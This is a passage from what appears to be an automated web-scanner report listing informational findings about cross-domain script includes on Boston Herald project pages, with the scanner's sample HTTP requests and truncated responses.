X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.707. http://www.bostonherald.com/projects/non_profit/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/non_profit/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /projects/non_profit/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // special_projects/ge
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.708. http://www.bostonherald.com/projects/payroll/brockton/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/brockton/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bh.heraldinteractive.com/projects/payroll/brock_payroll.js
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js

Request

GET /projects/payroll/brockton/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 29994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://bh.heraldinteractive.com/projects/payroll/brock_payroll.js" type="text/javascript"></script>
...[SNIP]...

18.709. http://www.bostonherald.com/projects/payroll/cambridge/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/cambridge/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bh.heraldinteractive.com/projects/payroll/cam_payroll.js
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js

Request

GET /projects/payroll/cambridge/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://bh.heraldinteractive.com/projects/payroll/cam_payroll.js" type="text/javascript"></script>
...[SNIP]...

18.710. http://www.bostonherald.com/projects/payroll/cca/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/cca/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js

Request

GET /projects/payroll/cca/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 27984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
...[SNIP]...

18.711. http://www.bostonherald.com/projects/payroll/mass_pike/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/mass_pike/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bh.heraldinteractive.com/projects/payroll/mass_pike.js
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://www.google-analytics.com/urchin.js

Request

GET /projects/payroll/mass_pike/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18.712. http://www.bostonherald.com/projects/payroll/quasi_state/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/quasi_state/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bh.heraldinteractive.com/projects/payroll/quasi_state.js
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /projects/payroll/quasi_state/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

18.713. http://www.bostonherald.com/projects/payroll/quincy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/quincy/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js

Request

GET /projects/payroll/quincy/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
...[SNIP]...

18.714. http://www.bostonherald.com/projects/payroll/springfield/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/springfield/

Issue detail

The response dynamically includes the following scripts from other domains:

http://bh.heraldinteractive.com/projects/payroll/spring_payroll.js
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js

Request

GET /projects/payroll/springfield/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 35134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://bh.heraldinteractive.com/projects/payroll/spring_payroll.js" type="text/javascript"></script>
...[SNIP]...

18.715. http://www.bostonherald.com/projects/payroll/suffolk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/suffolk/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js

Request

GET /projects/payroll/suffolk/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 30719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // special_projects/payro
...[SNIP]...
</script>

<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
...[SNIP]...

18.716. http://www.bostonherald.com/projects/payroll/worcester/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/payroll/worcester/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache.heraldinteractive.com/js/ajax.js
